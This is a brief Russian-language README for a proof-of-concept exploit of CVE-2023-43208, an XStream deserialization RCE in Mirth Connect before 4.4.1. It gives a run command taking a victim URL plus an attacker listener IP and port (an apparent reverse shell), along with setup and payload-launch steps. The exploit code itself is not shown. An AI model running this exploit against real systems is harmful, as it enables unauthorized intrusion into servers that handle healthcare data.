
Эксплуатирует уязвимость
Этот скрипт является доказательством концепции (PoC) для уязвимости удалённого выполнения кода (RCE) в Mirth Connect (версии до 4.4.1). Он эксплуатирует уязвимость десериализации XStream через API.
python3 CVE-2023-43208.py -u [https://IP-victima] -lh [IP-atacante] -lp [puerto]
Рекомендуется использование виртуального окружения:
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
#Запуск payload
python3 payload.py